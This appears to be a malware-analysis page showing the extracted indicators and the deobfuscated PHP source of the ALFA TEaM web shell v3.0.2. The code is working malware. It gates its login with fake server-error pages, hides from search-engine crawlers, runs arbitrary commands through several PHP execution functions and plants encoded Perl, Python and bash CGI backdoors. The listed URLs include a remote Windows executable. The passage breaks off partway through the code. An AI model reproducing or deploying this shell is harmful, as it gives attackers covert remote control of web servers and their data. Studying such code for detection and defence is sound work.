PHP Malware Analysis

Back to list

Tags

Encoding
base64_decode
base64_encode
URLs
http://solevisible.com/images/alfa-iran.png
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd
http://www.w3.org/1999/xhtml
https://fonts.googleapis.com/css?family=Francois+One
http://solevisible.com/images/alfabg.png
ftp.example.com
http://solevisible.com/icons/
http://solevisible.com/images/alfa-iran.png
http://zone-h.org/archive/notifier=ALFA%20TEaM%202012
http://solevisible.com/images/btn.png
http://solevisible.com/images/alfamini.png
http://solevisible.com/images/loader.png
http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=
http://solevisible.com/customcolors/
http://solevisible.com/
http://solevisible.com/images/farvahar-iran.png
http://site.com/whmcs
http://solevisible.com/update.json
http://www
http://md5decrypt.net/Api/api.php?hash=
http://md5decrypt.net/en/HashFinder/
http://solevisible.com/icons/
http://solevisible.com/icons/back.png
http://solevisible.com/icons/folder.png
http://solevisible.com/icons/notfound.png
http://site.com/whmcs
http://solevisible.com/bc/windows.exe
http://www.zone-h.com/notify/single
http://www
http://solevisible.com/images/farvahar-iran.png
http://php.net/manual/en/function
Emails
solevisible@gmail.com
solevisible@fbi.gov
target@fbi.gov
sec@google.com
Execution
system
eval
create_function
exec
passthru
proc_open
shell_exec
Input
_GET
_POST
Environment
set_time_limit
error_reporting
php_uname
getcwd

Deobfuscated code

<?php

$GLOBALS['NeUSMyPGXP'] = array(
    'usmfzmlHFCje' => 'admin',
    //login username
    'paLDRhHfAovu' => 'a6f452ec3293d7fb72c5b677257b20ec',
    //login password (MD5)... ehsan
    'saEuEgnDlHuL' => '1',
    //safe mode.. 0 = allow, 1 = deny
    'logXKTfQPNcx' => 'gui',
    //safe mode type.. gui = login and HTTP errors accepted: 500, 404, 403
    'shiJVQhUrFkw' => '1',
    //show icons.. 0 = not show, 1 = show
    'pogkUzMiAjqB' => true,
);
$XDmfxOnhck = 'function_exists';
$RxPWPyQqTL = 'charCodeAt';
$CyvIHOdCHU = 'eval';
$jgpUDiTPrk = 'gzinflate';
if (!function_exists('base64_encode')) {
    function nIWUkxhnhj($data)
    {
        if (empty($data)) {
            return;
        }
        $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';
        $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0;
        $ac = 0;
        $enc = '';
        $tmp_arr = array();
        if (!$data) {
            return $data;
        }
        do {
            $o1 = $RxPWPyQqTL($data, $i++);
            $o2 = $RxPWPyQqTL($data, $i++);
            $o3 = $RxPWPyQqTL($data, $i++);
            $bits = $o1 << 16 | $o2 << 8 | $o3;
            $h1 = $bits >> 18 & 0x3f;
            $h2 = $bits >> 12 & 0x3f;
            $h3 = $bits >> 6 & 0x3f;
            $h4 = $bits & 0x3f;
            $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4);
        } while ($i < strlen($data));
        $enc = implode($tmp_arr, '');
        $r = strlen($data) % 3;
        return ($r ? substr($enc, 0, $r - 3) : $enc) . substr('===', $r || 3);
    }
    function charCodeAt($data, $char)
    {
        return ord(substr($data, $char, 1));
    }
    function charAt($data, $char)
    {
        return substr($data, $char, 1);
    }
} else {
    function nIWUkxhnhj($s)
    {
        $b = 'base64_encode';
        return base64_encode($s);
    }
}
if (!$XDmfxOnhck('base64_decode')) {
    function QFdAWqZnUX($input)
    {
        if (empty($input)) {
            return;
        }
        $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
        $chr1 = $chr2 = $chr3 = "";
        $enc1 = $enc2 = $enc3 = $enc4 = "";
        $i = 0;
        $output = "";
        $input = preg_replace("[^A-Za-z0-9\\+\\/\\=]", "", $input);
        do {
            $enc1 = strpos($keyStr, substr($input, $i++, 1));
            $enc2 = strpos($keyStr, substr($input, $i++, 1));
            $enc3 = strpos($keyStr, substr($input, $i++, 1));
            $enc4 = strpos($keyStr, substr($input, $i++, 1));
            $chr1 = $enc1 << 2 | $enc2 >> 4;
            $chr2 = ($enc2 & 15) << 4 | $enc3 >> 2;
            $chr3 = ($enc3 & 3) << 6 | $enc4;
            $output .= chr((int) $chr1);
            if ($enc3 != 64) {
                $output .= chr((int) $chr2);
            }
            if ($enc4 != 64) {
                $output .= chr((int) $chr3);
            }
            $chr1 = $chr2 = $chr3 = "";
            $enc1 = $enc2 = $enc3 = $enc4 = "";
        } while ($i < strlen($input));
        return $output;
    }
} else {
    function QFdAWqZnUX($s)
    {
        $b = 'base64_decode';
        return base64_decode($s);
    }
}
$gEleJRqGNj = 'create_function';
$oFcbuslxiL = create_function('$cq', $CyvIHOdCHU . '(' . $jgpUDiTPrk . '(' . 'Q' . 'FdAW' . 'qZ' . 'n' . 'U' . 'X' . '' . '($cq)' . ')' . ')' . ';');
/* ufBAyNiLYhXtEhSseNmZlGuuOwOGcBLTnsgEApHxXujFVanOXqNpNWAMnYLMAGHaHTpIuoJkmboVlvpvaebpEaoskOINIUDeEhGI */
/* You're killing me again 🎧 Am I still in your head ? 🎧 You used to light me up 🎧 Now you shut me down -- Solevisible */
@session_start();
function __ZW5jb2Rlcg($s)
{
    return nIWUkxhnhj($s);
}
function __ZGVjb2Rlcg($s)
{
    return QFdAWqZnUX($s);
}
$GLOBALS['DB_NAME'] = $GLOBALS['NeUSMyPGXP'];
$check = false;
if (!isset($_SESSION["alfa_settings_signature"])) {
    $check = true;
} else {
    if ($_SESSION["alfa_settings_signature"] != md5(print_r($GLOBALS['DB_NAME'], true))) {
        $check = true;
    }
}
if ($check) {
    $_SESSION["alfa_settings_signature"] = md5(print_r($GLOBALS['DB_NAME'], true));
    foreach ($GLOBALS['NeUSMyPGXP'] as $key => $value) {
        $prefix = substr($key, 0, 2);
        if ($prefix == "us") {
            $GLOBALS['DB_NAME']["user"] = $value;
            $GLOBALS['DB_NAME']["user_rand"] = $key;
        } elseif ($prefix == "pa") {
            $GLOBALS['DB_NAME']["pass"] = $value;
            $GLOBALS['DB_NAME']["pass_rand"] = $key;
        } elseif ($prefix == "sa") {
            $GLOBALS['DB_NAME']["safemode"] = $value;
            $GLOBALS['DB_NAME']["safemode_rand"] = $key;
        } elseif ($prefix == "lo") {
            $GLOBALS['DB_NAME']["login_page"] = $value;
            $GLOBALS['DB_NAME']["login_page_rand"] = $key;
        } elseif ($prefix == "sh") {
            $GLOBALS['DB_NAME']["show_icons"] = $value;
            $GLOBALS['DB_NAME']["show_icons_rand"] = $key;
        } elseif ($prefix == "po") {
            $GLOBALS['DB_NAME']["post_encryption"] = $value;
            $GLOBALS['DB_NAME']["post_encryption_rand"] = $key;
        }
    }
    $_SESSION["alfa_db_settings"] = $GLOBALS['DB_NAME'];
} else {
    $GLOBALS['DB_NAME'] = $_SESSION["alfa_db_settings"];
}
unset($GLOBALS['NeUSMyPGXP']);
if (!isset($_SERVER["HTTP_HOST"])) {
    exit;
}
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spider");
    if (preg_match("/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider/i", $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}
if (!isset($GLOBALS['DB_NAME']['user'])) {
    exit('$GLOBALS[\'DB_NAME\'][\'user\']');
}
if (!isset($GLOBALS['DB_NAME']['pass'])) {
    exit('$GLOBALS[\'DB_NAME\'][\'pass\']');
}
if (!isset($GLOBALS['DB_NAME']['safemode'])) {
    exit('$GLOBALS[\'DB_NAME\'][\'safemode\']');
}
if (!isset($GLOBALS['DB_NAME']['login_page'])) {
    exit('$GLOBALS[\'DB_NAME\'][\'login_page\']');
}
if (!isset($GLOBALS['DB_NAME']['show_icons'])) {
    exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']');
}
if (!isset($GLOBALS['DB_NAME']['post_encryption'])) {
    exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']');
}
date_default_timezone_set('Asia/Tehran');
define("__ALFA_MD5NAME__", md5($_SERVER["SCRIPT_FILENAME"]));
define("__ALFA_VERSION__", "3.0.2");
define("__LAST_CWD__", "last_cwd___ALFA_MD5NAME__");
define("__PATH_HISTORY__", "path_history___ALFA_MD5NAME__");
define("__ALFA_POST_ENCRYPTION__", isset($GLOBALS["DB_NAME"]["post_encryption"]) && $GLOBALS["DB_NAME"]["post_encryption"] == true ? true : false);
$GLOBALS['__ALFA_COLOR__'] = array("shell_border" => array("key_color" => "#0E304A", "multi_selector" => array(".header" => "border: 7px solid {color}", "#meunlist" => "border-color: {color}", "#hidden_sh" => "background-color: {color}", ".ajaxarea" => "border: 1px solid {color}", ".foot" => "border-color: {color}")), "header_vars" => "#27979B", "header_values" => "#67ABDF", "header_on" => "#00FF00", "header_off" => "#ff0000", "header_none" => "#00FF00", "home_shell" => "#ff0000", "home_shell:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".home_shell:hover" => "color: {color};")), "back_shell" => "#efbe73", "back_shell:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".back_shell:hover" => "color: {color};")), "header_pwd" => "#00FF00", "header_pwd:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".header_pwd:hover" => "color: {color};")), "header_drive" => "#00FF00", "header_drive:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".header_drive:hover" => "color: {color};")), "header_show_all" => "#00FF00", "disable_functions" => "#ff0000", "footer_text" => "#27979B", "menu_options" => "#27979B", "menu_options:hover" => array("key_color" => "#646464", "multi_selector" => array(".menu_options:hover" => "background-color: {color};font-weight: unset;")), "options_list" => array("key_color" => "#00FF00", "multi_selector" => array(".ajaxarea .header center a" => "color: {color};")), "options_list:hover" => array("key_color" => "#FFFFFF", "multi_selector" => array(".ajaxarea .header center a:hover" => "color: {color};")), "options_list_header" => array("key_color" => "#59cc33", "multi_selector" => array(".txtfont_header" => "color: {color};")), "options_list_text" => array("key_color" => "#FFFFFF", "multi_selector" => array(".txtfont,.tbltxt" => "color: {color};")), "Alfa+" => array("key_color" => "#27E8AE", "multi_selector" => array(".alfa_plus" => "color: {color};font-weight: unset;")), "hidden_shell_text" => array("key_color" => "#00FF00", "multi_selector" => array("#hidden_sh a" => "color: {color};")), "hidden_shell_version" => "#ff0000", "shell_name" => "#FF0000", "main_row:hover" => array("key_color" => "#646464", "multi_selector" => array(".main tr:hover" => "background-color: {color};")), "main_header" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main th" => "color: {color};")), "main_name" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main .main_name" => "color: {color};font-weight: unset;")), "main_size" => "#67ABDF", "main_modify" => "#67ABDF", "main_owner_group" => "#67ABDF", "main_green_perm" => "#25ff00", "main_red_perm" => "#FF0000", "main_white_perm" => "#FFFFFF", "beetween_perms" => "#FFFFFF", "main_actions" => array("key_color" => "#FFFFFF", "multi_selector" => array(".main .actions" => "color: {color};")), "menu_options:hover" => array("key_color" => "#646464", "multi_selector" => array(".menu_options:hover" => "background-color: {color};font-weight: unset;")), "minimize_editor_background" => array("key_color" => "#0e304a", "multi_selector" => array(".minimized-wrapper" => "background-color: {color};")), "minimize_editor_text" => array("key_color" => "#f5deb3", "multi_selector" => array(".minimized-text" => "color: {color};")), "editor_border" => array("key_color" => "#0e304a", "multi_selector" => array(".editor-explorer,.editor-modal" => "border: 2px solid {color};")), "editor_background" => array("key_color" => "rgba(0, 1, 23, 0.94)", "multi_selector" => array(".editor-explorer,.editor-modal" => "background-color: {color};")), "editor_header_background" => array("key_color" => "rgba(21, 66, 88, 0.93)", "multi_selector" => array(".editor-header" => "background-color: {color};")), "editor_header_text" => array("key_color" => "#00ff7f", "multi_selector" => array(".editor-path" => "color: {color};")), "editor_header_button" => array("key_color" => "#1d5673", "multi_selector" => array(".close-button, .editor-minimize" => "background-color: {color};")), "editor_actions" => array("key_color" => "#FFFFFF", "multi_selector" => array(".editor_actions" => "color: {color};")), "editor_file_info_vars" => array("key_color" => "#FFFFFF", "multi_selector" => array(".editor_file_info_vars" => "color: {color};")), "editor_file_info_values" => array("key_color" => "#67ABDF", "multi_selector" => array(".filestools" => "color: {color};")), "editor_history_header" => array("key_color" => "#14ff07", "multi_selector" => array(".hheader-text,.history-clear" => "color: {color};")), "editor_history_list" => array("key_color" => "#03b3a3", "multi_selector" => array(".editor-file-name" => "color: {color};")), "editor_history_selected_file" => array("key_color" => "rgba(49, 55, 93, 0.77)", "multi_selector" => array(".is_active" => "background-color: {color};")), "editor_history_file:hover" => array("key_color" => "#646464", "multi_selector" => array(".file-holder > .history:hover" => "background-color: {color};")), "input_box_border" => array("key_color" => "#0E304A", "multi_selector" => array("input[type=text],textarea" => "border: 1px solid {color}")), "input_box_text" => array("key_color" => "#999999", "multi_selector" => array("input[type=text],textarea" => "color: {color};")), "input_box:hover" => array("key_color" => "#27979B", "multi_selector" => array("input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "select_box_border" => array("key_color" => "#0E304A", "multi_selector" => array("select" => "border: 1px solid {color}")), "select_box_text" => array("key_color" => "#FFFFEE", "multi_selector" => array("select" => "color: {color};")), "select_box:hover" => array("key_color" => "#27979B", "multi_selector" => array("select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "button_border" => array("key_color" => "#27979B", "multi_selector" => array("input[type=submit],.button,#addup" => "border: 1px solid {color};")), "button:hover" => array("key_color" => "#27979B", "multi_selector" => array("input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};", ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "outputs_text" => array("key_color" => "#67ABDF", "multi_selector" => array(".ml1" => "color: {color};")), "outputs_border" => array("key_color" => "#0E304A", "multi_selector" => array(".ml1" => "border: 1px solid {color};")), "uploader_border" => array("key_color" => "#0E304A", "multi_selector" => array(".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "uploader_background" => array("key_color" => "#0E304A", "multi_selector" => array(".inputfile strong" => "background-color: {color};")), "uploader_text_right" => array("key_color" => "#FFFFFF", "multi_selector" => array(".inputfile strong" => "color: {color};")), "uploader_text_left" => array("key_color" => "#25ff00", "multi_selector" => array(".inputfile span" => "color: {color};")), "uploader:hover" => array("key_color" => "#27979B", "multi_selector" => array(".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};")), "uploader_progress_bar" => array("key_color" => "#ff0000", "multi_selector" => array("#up_bar" => "background-color: {color};")), "mysql_tables" => "#00FF00", "mysql_table_count" => "#67ABDF", "copyright" => "#ff0000", "scrollbar" => array("key_color" => "#1e82b5", "multi_selector" => array("*::-webkit-scrollbar-thumb" => "background-color: {color};")), "scrollbar_background" => array("key_color" => "#000115", "multi_selector" => array("*::-webkit-scrollbar-track" => "background-color: {color};")));
$GLOBALS['__file_path'] = str_replace('\\', '/', trim("/var/www/html/input.php"));
$config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'], 'AlfaPass' => $GLOBALS['DB_NAME']['pass'], 'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'], 'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']);
@session_start();
if ($config['AlfaProtectShell']) {
    $SERVER_SIG = isset($_SERVER["SERVER_SIGNATURE"]) ? $_SERVER["SERVER_SIGNATURE"] : "";
    $Eform = '<form method="post"><input style="margin:0;background-color:#fff;border:1px solid #fff;" type="password" name="password"></form>';
    if ($config['AlfaLoginPage'] == 'gui') {
        if (@$_SESSION["AlfaUser"] != $config['AlfaUser'] && @$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])) {
            if (@$_POST["usrname"] == $config['AlfaUser'] && @md5($_POST["password"]) == $config['AlfaPass']) {
                @($_SESSION["AlfaUser"] = $config['AlfaUser']);
                @($_SESSION["AlfaPass"] = @md5($config['AlfaPass']));
                @header('location: ' . $_SERVER["PHP_SELF"]);
            }
            echo "\n<style>\nbody{background: black;}\n#loginbox { font-size:11px; color:green; right:85px; width:1200px; height:200px; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }\n#loginbox td { border-radius:5px; font-size:11px; }\n</style>\n<title>~ ALFA TEaM Shell-v3.0.2 ~</title><center>\n<center><img style=\"border-radius:100px;\" width=\"500\" height=\"250\" alt=\"\" src=\"http://solevisible.com/images/alfa-iran.png\" /></center>\n<div id=loginbox><p><font face=\"verdana,arial\" size=-1>\n<center><table cellpadding='2' cellspacing='0' border='0' id='ap_table'>\n<tr><td bgcolor=\"green\"><table cellpadding='0' cellspacing='0' border='0' width='100%'><tr><td bgcolor=\"green\" align=center style=\"padding:2;padding-bottom:4\"><b><font color=\"white\" size=-1 color=\"white\" face=\"verdana,arial\"><b>~ ALFA TEaM Shell-v3.0.2 ~</b></font></th></tr>\n<tr><td bgcolor=\"black\" style=\"padding:5\">\n<form method=\"post\">\n<input type=\"hidden\" name=\"action\" value=\"login\">\n<input type=\"hidden\" name=\"hide\" value=\"\">\n<center><table>\n<tr><td><font color=\"green\" face=\"verdana,arial\" size=-1>Login:</font></td><td><input type=\"text\" size=\"30\" name=\"usrname\" placeholder=\"username\" onfocus=\"if (this.value == 'username'){this.value = '';}\"></td></tr>\n<tr><td><font color=\"green\" face=\"verdana,arial\" size=-1>Password:</font></td><td><input type=\"password\" size=\"30\" name=\"password\" placeholder=\"password\" onfocus=\"if (this.value == 'password') this.value = '';\"></td></tr>\n<tr><td><font face=\"verdana,arial\" size=-1>&nbsp;</font></td><td><font face=\"verdana,arial\" size=-1><input type=\"submit\" value=\"Login\"></font></td></tr></table>\n</div><br /></center>";
            exit;
        }
    } elseif ($config['AlfaLoginPage'] == '500') {
        if (@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])) {
            if (@md5($_POST["password"]) == $config['AlfaPass']) {
                @($_SESSION["AlfaUser"] = $config['AlfaUser']);
                @($_SESSION["AlfaPass"] = @md5($config['AlfaPass']));
                header('location: ' . $_SERVER["PHP_SELF"]);
            }
            echo '<html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error or misconfiguration and was unable to complete your request.</p><p>Please contact the server administrator, ' . $_SERVER['SERVER_ADMIN'] . ' and inform them of the time the error occurred, and anything you might have done that may have caused the error.</p><p>More information about this error may be available in the server error log.</p><hr>' . $SERVER_SIG . '</body></html>' . $Eform;
            exit;
        }
    } elseif ($config['AlfaLoginPage'] == '403') {
        if (@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])) {
            if (@md5($_POST["password"]) == $config['AlfaPass']) {
                @($_SESSION["AlfaUser"] = $config['AlfaUser']);
                @($_SESSION["AlfaPass"] = @md5($config['AlfaPass']));
                header('location: ' . $_SERVER["PHP_SELF"]);
            }
            echo "<html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access " . $_SERVER['PHP_SELF'] . " on this server.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform;
            exit;
        }
    } elseif ($config['AlfaLoginPage'] == '404') {
        if (@$_SESSION["AlfaPass"] != @md5($config['AlfaPass'])) {
            if (@md5($_POST["password"]) == $config['AlfaPass']) {
                @($_SESSION["AlfaUser"] = $config['AlfaUser']);
                @($_SESSION["AlfaPass"] = @md5($config['AlfaPass']));
                header('location: ' . $_SERVER["PHP_SELF"]);
            }
            echo "<title>404 Not Found</title><h1>Not Found</h1><p>The requested URL " . $_SERVER['PHP_SELF'] . " was not found on this server.<br><br>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr>" . $SERVER_SIG . "</body></html>" . $Eform;
            exit;
        }
    }
}
function decrypt_post($str, $pwd)
{
    if (__ALFA_POST_ENCRYPTION__) {
        $pwd = __ZW5jb2Rlcg($pwd);
        $str = __ZGVjb2Rlcg($str);
        $enc_chr = "";
        $enc_str = "";
        $i = 0;
        while ($i < strlen($str)) {
            for ($j = 0; $j < strlen($pwd); $j++) {
                $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j]));
                $enc_str .= $enc_chr;
                $i++;
                if ($i >= strlen($str)) {
                    break;
                }
            }
        }
        return __ZGVjb2Rlcg($enc_str);
    } else {
        return __ZGVjb2Rlcg($str);
    }
}
function _AlfaSecretKey()
{
    if (!isset($_SESSION["AlfaSecretKey"])) {
        $_SESSION["AlfaSecretKey"] = uniqid(mt_rand(), true);
    }
    return $_SESSION["AlfaSecretKey"];
}
function alfa_getColor($target)
{
    if (isset($GLOBALS["DB_NAME"]["color"][$target]) && $GLOBALS["DB_NAME"]["color"][$target] != "") {
        return $GLOBALS["DB_NAME"]["color"][$target];
    } else {
        $target = $GLOBALS["__ALFA_COLOR__"][$target];
        if (is_array($target)) {
            return $target["key_color"];
        } else {
            return $target;
        }
    }
}
function alfaCssLoadColors()
{
    $css = "";
    foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value) {
        if (!is_array($value)) {
            $value = alfa_getColor($key);
            $css .= ".{$key}{color: {$value};}";
        } else {
            if (isset($value["multi_selector"])) {
                foreach ($value["multi_selector"] as $k => $v) {
                    $color = alfa_getColor($key);
                    $code = str_replace("{color}", $color, $v);
                    $css .= $k . "{" . $code . "}";
                }
            }
        }
    }
    return $css;
}
if (isset($_POST['ajax'])) {
    function AlfaNum()
    {
        $args = func_get_args();
        $alfax = array();
        $find = array();
        for ($i = 1; $i <= 10; $i++) {
            $alfax[] = $i;
        }
        foreach ($args as $arg) {
            $find[] = $arg;
        }
        echo "<script>";
        foreach ($alfax as $alfa) {
            if (in_array($alfa, $find)) {
                continue;
            }
            echo 'alfa' . $alfa . "_=";
        }
        echo "\"\"</script>";
    }
}
function _alfa_cgicmd($cmd, $lang = "perl")
{
    if (isset($_SESSION["alfacgiapi_mode"])) {
        return "";
    }
    $cmd_pure = $cmd;
    $is_curl = function_exists('curl_version');
    $is_socket = function_exists('fsockopen');
    if ($is_curl || $is_socket) {
        $recreate = false;
        if (isset($_SESSION["alfacgiapi"])) {
            if (!@file_exists("alfacgiapi/" . $_SESSION["alfacgiapi"] . ".alfa")) {
                $recreate = true;
                $lang = $_SESSION["alfacgiapi"];
            }
        }
        if (!isset($_SESSION["alfacgiapi"]) || $recreate) {
            @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
            $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM=';
            $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI=";
            $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C";
            if ($lang == "perl") {
                $source = $perl;
            } elseif ($lang == "py") {
                $source = $py;
            } else {
                $source = $bash;
            }
            alfaWriteTocgiapi($lang . ".alfa", $source);
            alfacgihtaccess('cgi', "alfacgiapi/");
        } else {
            $lang = $_SESSION["alfacgiapi"];
        }
        $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=" . __ZW5jb2Rlcg("cd " . $GLOBALS['cwd'] . ";" . $cmd);
        if ($is_curl) {
            $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://") . $_SERVER["SERVER_NAME"] . dirname($_SERVER["REQUEST_URI"]) . "/alfacgiapi/" . $lang . ".alfa";
            $post = new AlfaCURL();
            $data = $post->Send($address, "post", $cmd);
        } elseif ($is_socket) {
            $server = $_SERVER["SERVER_NAME"];
            $uri = dirname($_SERVER["REQUEST_URI"]) . "/alfacgiapi/" . $lang . ".alfa";
            $data = _alfa_fsockopen($server, $uri, $cmd);
        }
        $out = "";
        if (strstr($data, "[solevisible~api]")) {
            $_SESSION["alfacgiapi"] = $lang;
            if (@preg_match("/<pre>(.*?)<\\/pre>/s", $data, $res)) {
                $out = $res[1];
            }
        } elseif ($lang == "perl") {
            return _alfa_cgicmd($cmd_pure, "py");
        } elseif ($lang == "py") {
            return _alfa_cgicmd($cmd_pure, "bash");
        } else {
            $_SESSION["alfacgiapi_mode"] = "off";
        }
        return trim($out);
    } else {
        return "";
    }
}
function alfaEx($in, $re = false, $cgi = true, $all = false)
{
    $data = _alfa_php_cmd($in, $re);
    if (empty($data) && $cgi || $all) {
        if ($GLOBALS['sys'] == 'unix') {
            if (strlen(_alfa_php_cmd("whoami")) == 0 || $all) {
                $cmd = _alfa_cgicmd($in);
                if (!empty($cmd)) {
                    return $cmd;
                }
            }
        }
    }
    return $data;
}
function _alfa_php_cmd($in, $re = false)
{
    $out = '';
    try {
        if ($re) {
            $in .= " 2>&1";
        }
        if (function_exists('exec')) {
            @exec($in, $out);
            $out = @join("\n", $out);
        } elseif (function_exists('passthru')) {
            ob_start();
            @passthru($in);
            $out = ob_get_clean();
        } elseif (function_exists('system')) {
            ob_start();
            @system($in);
            $out = ob_get_clean();
        } elseif (function_exists('shell_exec')) {
            $out = shell_exec($in);
        } elseif (function_exists("popen") && function_exists("pclose")) {
            if (is_resource($f = @popen($in, "r"))) {
                $out = "";
                while (!@feof($f)) {
                    $out .= fread($f, 1024);
                }
                pclose($f);
            }
        } elseif (function_exists('proc_open')) {
            $pipes = array();
            $process = @proc_open($in . ' 2>&1', array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null);
            $out = @stream_get_contents($pipes[1]);
        } elseif (class_exists('COM')) {
            $alfaWs = new COM('WScript.shell');
            $exec = $alfaWs->exec('cmd.exe /c ' . $_POST['alfa1']);
            $stdout = $exec->StdOut();
            $out = $stdout->ReadAll();
        }
    } catch (Exception $e) {
    }
    return $out;
}
function _alfa_fsockopen($server, $uri, $post)
{
    $socket = @fsockopen($server, 80, $errno, $errstr, 15);
    if ($socket) {
        $http = "POST {$uri} HTTP/1.0\r\n";
        $http .= "Host: {$server}\r\n";
        $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
        $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $http .= "Content-length: " . strlen($post) . "\r\n";
        $http .= "Connection: close\r\n\r\n";
        $http .= $post . "\r\n\r\n";
        fwrite($socket, $http);
        $contents = "";
        while (!@feof($socket)) {
            $contents .= @fgets($socket, 4096);
        }
        list($header, $body) = explode("\r\n\r\n", $contents, 2);
        @fclose($socket);
        return $body;
    } else {
        return "";
    }
}
if (isset($_GET["solevisible"])) {
    @error_reporting("\0\0\17\3\30");
    echo "<html>";
    echo "<title>Solevisible Hidden Shell</title>";
    echo "<body bgcolor=#000000>";
    echo '<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">' . (function_exists('php_uname') ? php_uname() : '???') . '</font></b></big>';
    $safe_mode = @ini_get('safe_mode');
    if ($safe_mode) {
        $r = "<b style='color: red'>On</b>";
    } else {
        $r = "<b style='color: green'>Off</b>";
    }
